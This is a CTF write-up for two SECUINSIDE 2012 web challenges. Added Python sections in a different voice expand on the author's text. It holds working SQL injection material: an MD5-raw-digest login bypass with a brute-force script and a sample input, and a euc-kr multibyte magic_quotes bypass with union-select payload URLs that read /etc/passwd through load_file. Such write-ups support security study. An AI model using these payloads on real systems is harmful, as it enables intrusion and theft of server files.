Hello, I participated (as Tasteless) in the SECUINSIDE 2012 CTF prequals and really liked it because many web challenges were available. The other guys from the team were mostly missing, but I succeeded in finishing 5 of 6 challenges. Here are the writeups:


cliph: login bypass using MD5 in raw format

$mpw=md5("$_POST[ip]",true);
$q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));

In PHP, md5($string, true) returns the 16 raw bytes of the digest instead of the 32-character hex string, so the result can contain characters such as ', " and =. Here those bytes go into the query unescaped: magic_quotes only touches the request input, not a hash computed from it. A short usable injection is a digest that contains the three bytes '=' somewhere. Here is a small PHP script to find inputs that produce one:

<?php
// Brute-force decimal strings until the raw MD5 contains the bytes '=
for ($i = 1; $i <= 100000000; $i++) {
    if (strpos(md5($i, true), "'='") !== false) {
        echo $i . "\n";
    }
}
?>

It gave me a few numbers; I used 2998869 and logged in as

id:admin
ip:2998869

making the query

select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'

This is true because = in MySQL is left-associative: 'a'='b'='c' is parsed as ('a'='b')='c'. The inner comparison yields 0, and comparing that integer with the string 'c' casts 'c' to the number 0, so the whole expression is 0=0, i.e. true. The same happens with the digest above: ip='¦-' is false (0), and the remaining bytes ':ÚTŕÍ,pžÇ˝ß' cast to 0. Two things have to hold for this to work: the bytes after '=' must not start with a digit (they would cast to a non-zero number and 0=n is false), and the digest must not contain another ' or a \ that would change the structure of the query. The flag was visible once you logged in as admin. It actually required you to have at least 2147483647 gold; I guess admin had that much…
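The search and the MySQL reasoning above, as an added example (this is not code from the writeup or from the challenge). It automates the loop, discards digests whose surrounding bytes would break the query rather than bypass it, and models the ('a'='b')='c' evaluation. The regular expression that stands in for MySQL's string-to-number cast is this example's own approximation (longest numeric prefix, otherwise 0), and the function names raw_md5, usable_split, find_injectable and where_is_true are assumptions of the example, not anything from the challenge.

```python
import hashlib
import re

# This example's approximation of MySQL's string-to-number cast when a string
# is compared with an integer: the longest leading numeric prefix counts,
# anything else becomes 0. It is not MySQL's own implementation.
_NUM_PREFIX = re.compile(r"^[ \t\r\n]*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")


def raw_md5(s: str) -> bytes:
    """Same 16 bytes as PHP's md5($s, true)."""
    return hashlib.md5(s.encode()).digest()


def mysql_str_to_num(s: str) -> float:
    """'c' -> 0.0, '3abc' -> 3.0, ' -2.5e1x' -> -25.0 (approximation, see above)."""
    m = _NUM_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def where_is_true(stored_ip: str, left: str, right: str) -> bool:
    """Evaluate  ip='<left>'='<right>'  the way MySQL does.

    '=' is left-associative, so this is (ip='<left>') = '<right>'. The inner
    comparison yields 0 or 1; comparing that integer with a string casts the
    string to a number, so the clause is true whenever the stored value
    differs from <left> and <right> casts to 0."""
    inner = 1 if stored_ip == left else 0
    return inner == mysql_str_to_num(right)


def usable_split(digest: bytes, needle: bytes = b"'='"):
    """Split a raw digest around the needle, or return None if the needle is
    absent or the bytes around it would break the query instead of bypassing it."""
    i = digest.find(needle)
    if i < 0:
        return None
    left = digest[:i].decode("latin-1")             # 1:1 byte-to-char, like PHP strings
    right = digest[i + len(needle):].decode("latin-1")
    # Another quote or a backslash anywhere else changes the SQL structure.
    if any(c in "'\\" for c in left + right):
        return None
    # If the right part casts to a non-zero number, the outer comparison is 0 = n, false.
    if mysql_str_to_num(right) != 0:
        return None
    return left, right


def find_injectable(start: int = 1, limit: int = 10_000_000,
                    needle: bytes = b"'='"):
    """Walk decimal strings like the PHP loop, but keep only digests whose
    surrounding bytes leave the injected query well-formed."""
    for i in range(start, limit):
        parts = usable_split(raw_md5(str(i)), needle)
        if parts is not None:
            return i, parts
    return None


if __name__ == "__main__":
    print(where_is_true("10.0.0.1", "b", "c"))     # the 'a'='b'='c' case: True
    print(where_is_true("10.0.0.1", "b", "3x"))    # right part casts to 3: False
    hit = find_injectable()                         # roughly a million hashes, a few seconds
    if hit:
        n, (left, right) = hit
        print(n, repr(left), repr(right))
```

The filter in usable_split is the part the one-line PHP loop lacks: a digest that happens to contain '=' but also a stray ' or \ elsewhere gives a syntax error rather than a login, so it is worth skipping those before trying them against the target.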


sqlgeek

This is the hardest among the web challenges. I haven't really finished it, but I was pretty close.

$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr');
if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied");
if(strlen($_GET[view])>17) exit("Access Denied");
$q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));

magic_quotes was ON, and I used the multibyte character %bf%5c in order to be able to use $_GET[stat] for injection. The mechanism: magic_quotes turns the %5c backslash into \\, so view arrives as the bytes bf 5c 5c. The euc-kr conversion then consumes the lead byte 0xbf together with the first backslash as one (invalid) multibyte character, and a single bare backslash survives. That backslash escapes the closing quote of the ip='...' literal, so the literal runs on to the opening quote of $_GET[stat], and whatever stat contains lands outside any quotes. The blacklist and the 17-character limit only look at view, and the converted view is two harmless characters, so stat can carry the whole payload. So,

index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -

Now, $_SESSION[read_me]="/etc/passwd"; tells us to read /etc/passwd. The path is passed as the hex literal 0x2f6574632f706173737764 rather than a quoted string, because magic_quotes would escape the quotes in stat and break the query, so:

index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -
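The procedure above, as an added example (not the challenge's code): it reproduces the eregi() blacklist and strlen() check applied to view, emulates what magic_quotes does to stat, and strips the single-quoted literals from the assembled query to show which text reaches the SQL parser. CONVERTED_VIEW is an assumption of this example: it hardcodes the value of $_GET[view] after the euc-kr conversion as '?' followed by one backslash instead of emulating mbstring; the point is only that one of the two backslashes added by magic_quotes is gone. The helper names (view_rejected, addslashes, hex_literal, build_query, strip_string_literals, injection_reaches_parser) are this example's own.

```python
import re

# Assumed result of the euc-kr conversion on the bytes bf 5c 5c: the lead
# byte and the first backslash fold into one (invalid) character, shown here
# as '?', and a single backslash is left over.
CONVERTED_VIEW = "?\\"
STAT_PAYLOAD = " or 3=2 union select 1,2,3,4,5,6,7-- -"

# eregi() blacklist from the challenge source (case-insensitive).
VIEW_FILTER = re.compile(r"from|union|select|\(|\)| |\*|/|\t|into", re.IGNORECASE)


def view_rejected(view: str) -> bool:
    """The two checks the challenge applies to the converted view value."""
    return bool(VIEW_FILTER.search(view)) or len(view) > 17


def addslashes(s: str) -> str:
    """What magic_quotes_gpc does to every request parameter."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def hex_literal(s: str) -> str:
    """MySQL hex literal for a string: no quotes, so addslashes leaves it alone."""
    return "0x" + s.encode().hex()


def build_query(converted_view: str, stat: str) -> str:
    """The challenge's query template; stat has only been through addslashes."""
    return ("select * from challenge5 where ip='%s' and (str+dex+lnt+luc)='%s'"
            % (converted_view, addslashes(stat)))


def strip_string_literals(sql: str) -> str:
    """Replace single-quoted MySQL literals (honouring backslash escapes and
    doubled quotes) with '' so that only text the parser treats as SQL remains."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            out.append(sql[i])
            i += 1
            continue
        i += 1                      # consume the opening quote
        while i < n:
            if sql[i] == "\\" and i + 1 < n:
                i += 2              # escaped character, still inside the literal
            elif sql[i] == "'":
                if i + 1 < n and sql[i + 1] == "'":
                    i += 2          # doubled quote, still inside
                else:
                    i += 1
                    break           # closing quote
            else:
                i += 1
        out.append("''")
    return "".join(out)


def injection_reaches_parser(converted_view: str, stat: str) -> bool:
    """True when the union ends up outside every string literal."""
    return "union select" in strip_string_literals(build_query(converted_view, stat))


if __name__ == "__main__":
    print(view_rejected(STAT_PAYLOAD))                          # True: the payload cannot go in view
    print(view_rejected(CONVERTED_VIEW))                        # False: two harmless characters
    print(strip_string_literals(build_query(CONVERTED_VIEW, STAT_PAYLOAD)))
    print(injection_reaches_parser(CONVERTED_VIEW, STAT_PAYLOAD))   # True
    print(injection_reaches_parser("?\\\\", STAT_PAYLOAD))          # False: both backslashes kept
    print(addslashes("load_file('/etc/passwd')"))               # quotes get escaped, query breaks
    print("load_file(%s)" % hex_literal("/etc/passwd"))         # 0x2f6574632f706173737764
```

Running the "?\\\\" case alongside the real one is the useful check: with both backslashes intact the ip literal closes normally and the whole of stat stays inside its own quotes, so the multibyte trick is what makes the stat parameter injectable, not anything about stat itself.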

From there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php, and it included your session, returning its values. Now I didn't know what to do; I knew I needed to get command execution somehow but didn't know how. After the CTF ended, user "hvortex" said I could manipulate $_SESSION[id] due to extract($_GET); which I didn't see… I guess you could use something like $_SESSION[id]= then include and read the flag. I was wrong; here is the whole writeup: Reiners blog

This is one of the best web challenges I have encountered so far. =)